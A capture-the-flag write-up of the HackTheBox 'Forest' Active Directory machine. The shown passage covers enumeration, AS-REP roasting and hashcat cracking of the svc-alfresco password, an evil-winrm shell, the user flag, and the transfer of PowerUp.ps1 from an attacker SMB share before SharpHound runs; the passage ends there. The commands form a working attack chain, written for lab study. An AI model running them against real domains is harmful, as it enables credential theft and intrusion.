HTB - Forest
- Nmap Scan
- Enumeration
- Initial Access
- Privilege Enumeration
- Running SharpHound
- Privilege Escalation
- Lateral Movement
Nmap Scan
Performing nmap scan on the target machine,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -sV -sC -A 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:17 EDT
Nmap scan report for 10.10.10.161
Host is up (0.26s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-27 06:30:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h30m58s, deviation: 4h02m30s, median: 10m58s
| smb2-time:
| date: 2022-03-27T06:31:20
|_ start_date: 2022-03-27T06:22:50
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-03-26T23:31:16-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.21 seconds
Seems like it is an active directory environment and there are lots of services running in it
Scanning for services running in other ports,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:37 EDT
Nmap scan report for 10.10.10.161
Host is up (0.24s latency).
Not shown: 9986 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
4793/tcp filtered unknown
5985/tcp open wsman
9389/tcp open adws
Nmap done: 1 IP address (1 host up) scanned in 328.70 seconds
Enumeration
From the nmap scan result, we can see that the machine is running on a domain named htb.local
Here, 5985/tcp open wsman is running and it means that PS-Remoting is enabled
We can also find 53/tcp open domain and 389/tcp open ldap running on this machine, which means the target is a Domain Controller
Enumerating SMB
For SMB service,
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
So we can’t perform relaying attacks since SMB signing is enabled and required
Enumerating SMB with smbmap and smbclient,
┌──(kali㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.161
[+] IP: 10.10.10.161:445 Name: 10.10.10.161
┌──(kali㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.161 -u monish -p fake
[!] Authentication error on 10.10.10.161
┌──(kali㉿aidenpearce369)-[~]
└─$ smbclient -L //10.10.10.161 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
It seems like it requires authentication
Enumerating RPC
Lets enumerate RPC with no pass authentication,
┌──(kali㉿aidenpearce369)-[~]
└─$ rpcclient 10.10.10.161 -U "" -N
rpcclient $> help
--------------- ----------------------
MDSSVC
fetch_properties Fetch connection properties
fetch_attributes Fetch attribute
...
Since we are able to run commands in RPC, we can even do enumeration about the domain here
Enumerating domain information,
rpcclient $> enumdomains
name:[HTB] idx:[0x0]
name:[Builtin] idx:[0x0]
Enumerating domain users,
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Enumerating domain groups,
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
Atleast we got some basic information useful for passive enumeration, it required authentication for active enumeration using rpcclient
We can even query some LDAP information about the user by passing the Relative Identifier (RID), in this case our Domain Admin - Administrator
rpcclient $> queryuser 0x1f4
User Name : Administrator
Full Name : Administrator
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : Sun, 27 Mar 2022 02:23:35 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Mon, 30 Aug 2021 20:51:59 EDT
Password can change Time : Tue, 31 Aug 2021 20:51:59 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000010
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000061
padding1[0..7]...
logon_hrs[0..21]...
Lets query the group details and its members, in this case we will try for Domain Admins group
rpcclient $> querygroup 0x200
Group Name: Domain Admins
Description: Designated administrators of the domain
Group Attribute:7
Num Members:1
rpcclient $> querygroupmem 0x200
rid:[0x1f4] attr:[0x7]
Enumerating LDAP
Since ldap service is running, lets try to query it with anonymous/null binding
Running ldapsearch,
┌──(kali㉿aidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161 -D "DC=htb,DC=local" -b "DC=htb,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20220327062240.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAOqNrI1l5QUq5WV+CaJoIcQ==
uSNChanged: 888873
name: htb
objectGUID:: Gsfw30mpJkuMe1Lj4stuqw==
...
So we can perform anonymous/null binding,
Lets try passing custom queries to enumerate further,
Searching for Users CN,
┌──(kali㉿aidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161 -D "DC=htb,DC=local" -b "CN=Users,DC=htb,DC=local" | grep dn
dn: CN=Users,DC=htb,DC=local
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
dn: CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Protected Users,CN=Users,DC=htb,DC=local
dn: CN=Key Admins,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
dn: CN=DnsAdmins,CN=Users,DC=htb,DC=local
dn: CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
dn: CN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=local
dn: CN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=
dn: CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,
dn: CN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=local
dn: CN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9},CN=Users,DC=htb,DC=
dn: CN=Administrator,CN=Users,DC=htb,DC=local
dn: CN=Guest,CN=Users,DC=htb,DC=local
dn: CN=DefaultAccount,CN=Users,DC=htb,DC=local
dn: CN=krbtgt,CN=Users,DC=htb,DC=local
dn: CN=Domain Computers,CN=Users,DC=htb,DC=local
dn: CN=Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Schema Admins,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Admins,CN=Users,DC=htb,DC=local
dn: CN=Cert Publishers,CN=Users,DC=htb,DC=local
dn: CN=Domain Admins,CN=Users,DC=htb,DC=local
dn: CN=Domain Users,CN=Users,DC=htb,DC=local
dn: CN=Domain Guests,CN=Users,DC=htb,DC=local
dn: CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
dn: CN=RAS and IAS Servers,CN=Users,DC=htb,DC=local
So these are the possible accounts available in this domain,
┌──(kali㉿aidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161 -D "DC=htb,DC=local" -b "DC=htb,DC=local" -W "(|(objectClass=person)(objectClass=user))" sAMAccountName | grep sAM
Enter LDAP Password:
# requesting: sAMAccountName
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: FOREST$
sAMAccountName: EXCH01$
sAMAccountName: $331000-VK4ADACQNUCA
sAMAccountName: SM_2c8eef0a09b545acb
sAMAccountName: SM_ca8c2ed5bdab4dc9b
sAMAccountName: SM_75a538d3025e4db9a
sAMAccountName: SM_681f53d4942840e18
sAMAccountName: SM_1b41c9286325456bb
sAMAccountName: SM_9b69f1b9d2cc45549
sAMAccountName: SM_7c96b981967141ebb
sAMAccountName: SM_c75ee099d0a64c91b
sAMAccountName: SM_1ffab36a2f5f479cb
sAMAccountName: HealthMailboxc3d7722
sAMAccountName: HealthMailboxfc9daad
sAMAccountName: HealthMailboxc0a90c9
sAMAccountName: HealthMailbox670628e
sAMAccountName: HealthMailbox968e74d
sAMAccountName: HealthMailbox6ded678
sAMAccountName: HealthMailbox83d6781
sAMAccountName: HealthMailboxfd87238
sAMAccountName: HealthMailboxb01ac64
sAMAccountName: HealthMailbox7108a4e
sAMAccountName: HealthMailbox0659cc1
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
Lets try using impacket tools for more detailed output
Using impacket-GetADUsers to list all users in the domain,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-GetADUsers htb.local/ -dc-ip 10.10.10.161 -no-pass -all
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Querying 10.10.10.161 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator Administrator@htb.local 2021-08-30 20:51:58.690463 2022-03-27 02:23:35.195845
Guest <never> <never>
DefaultAccount <never> <never>
krbtgt 2019-09-18 06:53:23.467452 <never>
$331000-VK4ADACQNUCA <never> <never>
SM_2c8eef0a09b545acb SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local <never> <never>
SM_ca8c2ed5bdab4dc9b SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local <never> <never>
SM_75a538d3025e4db9a SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local <never> <never>
SM_681f53d4942840e18 DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local <never> <never>
SM_1b41c9286325456bb Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local <never> <never>
SM_9b69f1b9d2cc45549 FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local <never> <never>
SM_7c96b981967141ebb SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local <never> <never>
SM_c75ee099d0a64c91b SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local <never> <never>
SM_1ffab36a2f5f479cb SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local <never> <never>
HealthMailboxc3d7722 HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local 2019-09-23 18:51:31.892097 2019-09-23 18:57:12.361516
HealthMailboxfc9daad HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local 2019-09-23 18:51:35.267114 2019-09-23 18:52:05.736012
HealthMailboxc0a90c9 HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local 2019-09-19 07:56:35.206329 <never>
HealthMailbox670628e HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local 2019-09-19 07:56:45.643993 <never>
HealthMailbox968e74d HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local 2019-09-19 07:56:56.143969 <never>
HealthMailbox6ded678 HealthMailbox6ded67848a234577a1756e072081d01f@htb.local 2019-09-19 07:57:06.597012 <never>
HealthMailbox83d6781 HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local 2019-09-19 07:57:17.065809 <never>
HealthMailboxfd87238 HealthMailboxfd87238e536e49e08738480d300e3772@htb.local 2019-09-19 07:57:27.487679 <never>
HealthMailboxb01ac64 HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local 2019-09-19 07:57:37.878559 <never>
HealthMailbox7108a4e HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local 2019-09-19 07:57:48.253341 <never>
HealthMailbox0659cc1 HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local 2019-09-19 07:57:58.643994 <never>
sebastien 2019-09-19 20:29:59.544725 2019-09-22 18:29:29.586227
lucinda 2019-09-19 20:44:13.233891 <never>
svc-alfresco 2022-03-27 03:22:03.296517 2019-09-23 07:09:47.931194
andy 2019-09-22 18:44:16.291082 <never>
mark 2019-09-20 18:57:30.243568 <never>
santi 2019-09-20 19:02:55.134828 <never>
And from further enumeration, there are no SPNs and it is running x64 bit architecture
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-GetUserSPNs htb.local/ -dc-ip 10.10.10.161 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
No entries found!
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-getArch -target 10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Gathering OS architecture for 1 machines
[*] Socket connect timeout set to 2 secs
10.10.10.161 is 64-bit
Initial Access
Lets try to search for a specific user which has DONT_REQUIRE_PREAUTH so that we can perform ASREP-Roasting
Searching for users with DONT_REQUIRE_PREAUTH UAC flag
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2022-03-27 03:28:19.172241 2019-09-23 07:09:47.931194 0x410200
Requesting a TGT to crack it to get the plain text password by ASREP-Roasting,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9
Now cracking the TGT using hashcat,
┌──(aidenpearce369㉿ragnar)-[~]
└─$ hashcat -h | grep 18200
18200 | Kerberos 5 AS-REP etype 23 | Network Protocols
┌──(aidenpearce369㉿ragnar)-[~]
└─$ hashcat -m 18200 '$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9' /opt/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: NVIDIA GeForce RTX 3050 Laptop GPU, 977/3910 MB allocatable, 16MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Temperature abort trigger set to 90c
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=806 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.089e1f35.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /opt/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40...55b3b9
Time.Started.....: Sun Mar 27 12:56:43 2022 (1 sec)
Time.Estimated...: Sun Mar 27 12:56:44 2022 (0 secs)
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18155.2 kH/s (11.80ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4194304/14344385 (29.24%)
Rejected.........: 0/4194304 (0.00%)
Restore.Point....: 3145728/14344385 (21.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: tomabogu -> rogans
Hardware.Mon.#1..: Temp: 59c Util: 45% Core:1665MHz Mem:5500MHz Bus:4
Started: Sun Mar 27 12:56:39 2022
Stopped: Sun Mar 27 12:56:44 2022
Seems like the password for the account HTB.LOCAL/svc-alfresco is s3rvice
Now lets use evil-winrm to use PS-Remoting to gain shell,
┌──(kali㉿aidenpearce369)-[~]
└─$ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> hostname
FOREST
Getting the secrets,
*Evil-WinRM* PS C:\Users\svc-alfresco> dir
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/26/2022 11:23 PM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> more user.txt
<USER FLAG>
Privilege Enumeration
Lets try to enumerate the current privileges of the user,
*Evil-WinRM* PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\>
Now lets try to run PowerUp.ps1 to check for any possible privilege escalation,
Transfer files via SMB
┌──(kali㉿aidenpearce369)-[~]
└─$ locate PowerUp.ps1
/usr/lib/python3/dist-packages/cme/data/powersploit/Privesc/PowerUp.ps1
/usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1
/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
┌──(kali㉿aidenpearce369)-[~]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1 .
┌──(kali㉿aidenpearce369)-[~]
└─$ mkdir SMBShare
┌──(kali㉿aidenpearce369)-[~]
└─$ cp PowerUp.ps1 SMBShare/
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-smbserver MONISH SMBShare
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
...
Copying our scripts in a writable location,
*Evil-WinRM* PS C:\Users\svc-alfresco> copy \\10.10.14.4\MONISH\PowerUp.ps1 .
*Evil-WinRM* PS C:\Users\svc-alfresco> ls
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
-a---- 3/27/2022 1:18 AM 563259 PowerUp.ps1
Running PowerUp.ps1 became useless causing some privilege and WMI errors
Running SharpHound
Lets try to gather information using SharpHound and load the output from ingestors into BloodHound to analyse the shortest path
Copying it on our target machine and running the ingestors,
*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe --collectionmethods All --domain htb.local --ldapUsername svc-alfresco --ldappassword s3rvice
2022-03-27T05:16:37.0031421-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-27T05:16:37.0656410-07:00|INFORMATION|Initializing SharpHound at 5:16 AM on 3/27/2022
2022-03-27T05:16:38.8781460-07:00|INFORMATION|Loaded cache with stats: 120 ID to type mappings.
120 name to SID mappings.
